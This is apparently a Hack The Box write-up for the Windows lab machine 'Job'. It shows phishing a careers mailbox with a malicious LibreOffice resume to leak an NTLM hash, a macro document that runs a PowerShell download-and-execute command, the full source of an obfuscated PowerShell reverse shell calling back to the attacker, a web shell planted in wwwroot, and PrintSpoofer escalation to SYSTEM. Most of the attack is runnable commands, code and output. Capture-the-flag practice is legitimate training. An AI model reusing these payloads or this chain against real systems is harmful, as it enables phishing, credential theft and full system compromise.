HTB | Job

Machine - https://app.hackthebox.com/machines/Job

IP - 10.129.234.73

NMAP

└─$ nmap -sC -sV -p 25,80,445,3389,5985 10.129.234.73 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-10-10 19:23 IST
Nmap scan report for 10.129.234.73
Host is up (1.4s latency).

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-10T13:56:08+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=job
| Not valid before: 2025-09-04T13:43:05
|_Not valid after:  2026-03-06T13:43:05
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-10-10T13:55:37
|_  start_date: N/A

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 158.61 seconds

Port 80

There is only a single webpage with an email career@job.local asking to send resume for hiring.

whatweb

└─$ whatweb -v -a 3 <http://Job.local/>
WhatWeb report for <http://Job.local/>
Status    : 200 OK
Title     : Job.local
IP        : 10.129.234.73
Country   : RESERVED, ZZ

Summary   : Bootstrap, Email[career@job.loca], HTML5, HTTPServer[Microsoft-IIS/10.0], Microsoft-IIS[10.0], Script, X-Powered-By[ASP.NET]

Detected Plugins:
[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Website     : <https://getbootstrap.com/>

[ Email ]
        Extract email addresses. Find valid email address and 
        syntactically invalid email addresses from mailto: link 
        tags. We match syntactically invalid links containing 
        mailto: to catch anti-spam email addresses, eg. bob at 
        gmail.com. This uses the simplified email regular 
        expression from 
        <http://www.regular-expressions.info/email.html> for valid 
        email address matching. 

        String       : career@job.loca

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : Microsoft-IIS/10.0 (from server string)

[ Microsoft-IIS ]
        Microsoft Internet Information Services (IIS) for Windows 
        Server is a flexible, secure and easy-to-manage Web server 
        for hosting anything on the Web. From media streaming to 
        web application hosting, IIS's scalable and open 
        architecture is ready to handle the most demanding tasks. 

        Version      : 10.0
        Website     : <http://www.iis.net/>

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 

[ X-Powered-By ]
        X-Powered-By HTTP header 

        String       : ASP.NET (from x-powered-by string)

HTTP Headers:
        HTTP/1.1 200 OK
        Content-Type: text/html
        Last-Modified: Sun, 07 Nov 2021 13:05:58 GMT
        Accept-Ranges: bytes
        ETag: "0bf9f34d8d3d71:0"
        Server: Microsoft-IIS/10.0
        X-Powered-By: ASP.NET
        Date: Fri, 10 Oct 2025 14:01:04 GMT
        Connection: close
        Content-Length: 3261

dirsearch

Nothing interesting was there

└─$ dirsearch -u <http://job.local/> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 29999

Output File: /home/anurag/htb/Job/reports/http_job.local/__25-10-10_19-31-44.txt

Target: <http://job.local/>

[19:31:44] Starting: 
[19:32:12] 301 -  144B  - /css  ->  <http://job.local/css/>                   
[19:32:12] 301 -  143B  - /js  ->  <http://job.local/js/>                     
[19:32:16] 301 -  154B  - /aspnet_client  ->  <http://job.local/aspnet_client/>
[19:32:19] 301 -  147B  - /assets  ->  <http://job.local/assets/>             
[19:32:38] 301 -  144B  - /CSS  ->  <http://job.local/CSS/>                   
[19:33:03] 301 -  143B  - /JS  ->  <http://job.local/JS/>                     
[19:33:06] 301 -  147B  - /Assets  ->  <http://job.local/Assets/>             
[19:33:19] 301 -  143B  - /Js  ->  <http://job.local/Js/>                     
[19:33:19] 301 -  144B  - /Css  ->  <http://job.local/Css/>                   
[19:40:26] 301 -  154B  - /Aspnet_client  ->  <http://job.local/Aspnet_client/>
[19:46:14] 301 -  154B  - /aspnet_Client  ->  <http://job.local/aspnet_Client/>
[19:57:08] 301 -  154B  - /ASPNET_CLIENT  ->  <http://job.local/ASPNET_CLIENT/>
[20:02:25] 400 -  324B  - /error%1F_log                                     
                                                                             
Task Completed

Port 25

We can try sending mail using sendmail

On the webpage it was mentioned that please send your cv as a libre office document So we will send the mail with malicious .odt file and try to get the ntlm hash

Let’s use this GitHub repo for creating .odt file

└─$ python3 badodt.py
/home/anurag/htb/Job/badodf/badodt.py:13: SyntaxWarning: invalid escape sequence '\\/'
  / __ )____ _____/ /     / __ \\/ __ \\/ ____/

    ____            __      ____  ____  ______
   / __ )____ _____/ /     / __ \\/ __ \\/ ____/
  / __  / __ `/ __  /_____/ / / / / / / /_    
 / /_/ / /_/ / /_/ /_____/ /_/ / /_/ / __/    
/_____/\\__,_/\\__,_/      \\____/_____/_/     

Create a malicious ODF document help leak NetNTLM Creds

By Richard Davy 
@rd_pentest
Python3 version by @gustanini
www.secureyourit.co.uk

Please enter IP of listener: 10.10.16.27
/home/anurag/htb/Job/badodf/bad.odt successfully created

now it’s time for testing, it did not worked for some reason

Now I will try msfconsole for creating the .odt file

─$ sudo msfconsole
[sudo] password for anurag: 
Metasploit tip: Use sessions -1 to interact with the last opened session
                                                  
# cowsay++
 ____________                                                                                                                                                                                                                                                                 
< metasploit >                                                                                                                                                                                                                                                                
 ------------                                                                                                                                                                                                                                                                 
       \\   ,__,                                                                                                                                                                                                                                                               
        \\  (oo)____                                                                                                                                                                                                                                                           
           (__)    )\\                                                                                                                                                                                                                                                         
              ||--|| *                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                              

       =[ metasploit v6.4.18-dev                          ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: <https://docs.metasploit.com/>

msf6 > use auxiliary/fileformat/odt_badodt
msf6 auxiliary(fileformat/odt_badodt) > set filename resume.odt
filename => resume.odt
msf6 auxiliary(fileformat/odt_badodt) > set lhost 10.10.16.27
lhost => 10.10.16.27
msf6 auxiliary(fileformat/odt_badodt) > run

[*] Generating Malicious ODT File 
[*] SMB Listener Address will be set to 10.10.16.27
[+] resume.odt stored at /root/.msf4/local/resume.odt
[*] Auxiliary module execution completed
msf6 auxiliary(fileformat/odt_badodt) > 

and I will start my smb listener and send the mail

└─$ sendemail -f 'anurag@lookingforajob.com' -t 'career@job.local' -s 10.129.234.73:25 -u 'Resume' -m 'Attaching my resume for your reference' -a 'resume.odt'                    
Oct 10 21:17:05 anurag sendemail[98615]: Email was sent successfully!

on listner, I got the hash

└─$ impacket-smbserver share . -smb2support 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.234.73,65248)
[*] AUTHENTICATE_MESSAGE (JOB\\jack.black,JOB)
[*] User JOB\\jack.black authenticated successfully
[*] jack.black::JOB:aaaaaaaaaaaaaaaa:565ca1c42f3725fae418656b463a361d:010100000000000000c0ba24fd39dc01c8e7758b646173e100000000010010007a006d004d004b005000470068004700030010007a006d004d004b0050004700680047000200100072006a0055006f0071006100660077000400100072006a0055006f0071006100660077000700080000c0ba24fd39dc0106000400020000000800300030000000000000000000000000200000994b80cab985d99ebf724c7858c50336740c7475be965e3f6f42d2c1c88503160a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00320037000000000000000000
[*] Closing down connection (10.129.234.73,65248)

let’s try to crack the hash, but not able to crack it

$ hashcat jack_hash.txt /home/anurag/stuff/rockyou.txt  
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 3550H with Radeon Vega Mobile Gfx, 1438/2941 MB (512 MB allocatable), 3MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /home/anurag/stuff/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  <https://hashcat.net/faq/wrongdriver>

* Create more work items to make use of your parallelization power:
  <https://hashcat.net/faq/morework>

Approaching final keyspace - workload adjusted.           

Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JACK.BLACK::JOB:aaaaaaaaaaaaaaaa:565ca1c42f3725fae4...000000
Time.Started.....: Fri Oct 10 21:40:18 2025 (20 secs)
Time.Estimated...: Fri Oct 10 21:40:38 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/anurag/stuff/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   810.9 kH/s (0.65ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2121216a696d212121] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 65%

Started: Fri Oct 10 21:40:08 2025
Stopped: Fri Oct 10 21:40:40 2025

foothold/ shell

Shell as ?

Getting shell via ODT file

I will use msfconsole for the exploit

msf6 > use multi/misc/openoffice_document_macro
msf6 exploit(multi/misc/openoffice_document_macro) > set lhost 10.10.14.15
msf6 exploit(multi/misc/openoffice_document_macro) > set lport 80
msf6 exploit(multi/misc/openoffice_document_macro) > set payload windows/x64/exec
msf6 exploit(multi/misc/openoffice_document_macro) > set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('<http://10.10.14.15/Invoke-PowerShellTcpEx.ps1>');"
msf6 exploit(multi/misc/openoffice_document_macro) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) > 
[*] Using URL: <http://10.10.14.15:8080/WyHDPdQBH>
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /root/.msf4/local/msf.odt

└─$ cat Invoke-PowerShellTcpEx.ps1         
function Power
{ 

    [CmdletBinding(DefaultParameterSetName="reverse")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind

    )

    
    try 
    {
        $String = "stekcoS.teN"
        $class = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
        if ($Reverse)
        {
            $client = New-Object System.$class.TCPClient($IPAddress,$Port)
        }

        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()    
            $client = $listener.AcceptTcpClient()
        } 

        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}

        $sbs = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sbs,0,$sbs.Length)

        $sbs = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sbs,0,$sbs.Length)

        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target." 
                Write-Error $_
            }
            $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x

            $sb = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sb,0,$sb.Length)
            $stream.Flush()  
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}

Power -Reverse -IPAddress 10.10.14.15 -Port 9001

Let’s download WyHDPdQBH and rename Invoke-PowerShellTcpEx.ps1 to WyHDPdQBH

└─$ wget <http://10.10.14.15:8080/WyHDPdQBH>                                                                                        
--2025-10-14 20:06:36--  <http://10.10.14.15:8080/WyHDPdQBH>
Connecting to 10.10.14.15:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3650 (3.6K) [application/octet-stream]
Saving to: ‘WyHDPdQBH’

WyHDPdQBH                                                              100%[=================================================================================================================================================================>]   3.56K  --.-KB/s    in 0s      

2025-10-14 20:06:36 (186 MB/s) - ‘WyHDPdQBH’ saved [3650/3650]

                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Job]
└─$ cp Invoke-PowerShellTcpEx.ps1 WyHDPdQBH     

Now let’s send the mail

#set up the listener
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (<http://0.0.0.0:80/>) ...
10.129.146.164 - - [14/Oct/2025 20:10:22] "GET /Invoke-PowerShellTcpEx.ps1 HTTP/1.1" 200 -

└─$ sendemail -f 'anurag@lookingforajob.com' -t 'career@job.local' -s 10.129.146.164:25 -u 'Resume' -m 'Attaching my resume for your reference' -a msf.odt
Oct 14 20:09:57 anurag sendemail[79254]: Email was sent successfully!

#on msf
[*] 10.129.146.164   openoffice_document_macro - Sending payload

#on listner
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.146.164] 49811
Windows PowerShell running as user jack.black on JOB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\\Program Files\\LibreOffice\\program>

found user.txt

 Directory of C:\\Users\\jack.black\\Desktop

11/09/2021  09:43 PM    <DIR>          .
04/16/2025  10:48 AM    <DIR>          ..
10/14/2025  01:39 PM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   5,411,229,696 bytes free

Privilege Escalation

Shell as ?

file upload on wwwroot

The user job\jack.black, who is a member of the JOB\developers group. This group is explicitly granted FullControl permissions on C:\\inetpub\\wwwroot

PS C:\\inetpub\\wwwroot> (Get-Acl .).Access | Format-Table IdentityReference,FileSystemRights,AccessControlType -AutoSize

IdentityReference                      FileSystemRights AccessControlType
-----------------                      ---------------- -----------------
BUILTIN\\IIS_IUSRS           ReadAndExecute, Synchronize             Allow
JOB\\developers                              FullControl             Allow
NT SERVICE\\TrustedInstaller                 FullControl             Allow
NT SERVICE\\TrustedInstaller                   268435456             Allow
NT AUTHORITY\\SYSTEM                         FullControl             Allow
NT AUTHORITY\\SYSTEM                           268435456             Allow
BUILTIN\\Administrators                      FullControl             Allow
BUILTIN\\Administrators                        268435456             Allow
BUILTIN\\Users               ReadAndExecute, Synchronize             Allow
BUILTIN\\Users                               -1610612736             Allow
CREATOR OWNER                                 268435456             Allow

PS C:\\inetpub\\wwwroot> whoami
job\\jack.black
PS C:\\inetpub\\wwwroot> whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                           Attributes                                        
====================================== ================ ============================================= ==================================================
Everyone                               Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
JOB\\developers                         Alias            S-1-5-21-3629909232-404814612-4151782453-1001 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Remote Desktop Users           Alias            S-1-5-32-555                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users                          Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\INTERACTIVE               Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Authenticated Users       Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\This Organization         Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Local account             Well-known group S-1-5-113                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\NTLM Authentication       Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\\Medium Mandatory Level Label            S-1-16-8192                                                                                     
PS C:\\inetpub\\wwwroot> 

Let’s upload the shell.aspx on wwwroot and load the page http://10.129.146.164/shell.aspx and on the listener

└─$ nc -nlvp 1234  
listening on [any] 1234 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.146.164] 49817
Spawn Shell...
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.

c:\\windows\\system32\\inetsrv>whoami
whoami
iis apppool\\defaultapppool

c:\\windows\\system32\\inetsrv>

SeImpersonatePrivilege

c:\\windows\\system32\\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

c:\\windows\\system32\\inetsrv>

It’s time to use the potato attack

and we are nt authority\\system

PS C:\\temp> .\\PrintSpoofer64.exe -i -c cmd
.\\PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.

C:\\Windows\\system32>whoami
whoami
nt authority\\system

and we got the root.txt

 Directory of C:\\Users\\Administrator\\Desktop

11/10/2021  05:45 PM    <DIR>          .
11/09/2021  08:51 PM    <DIR>          ..
10/14/2025  01:39 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   5,397,835,776 bytes free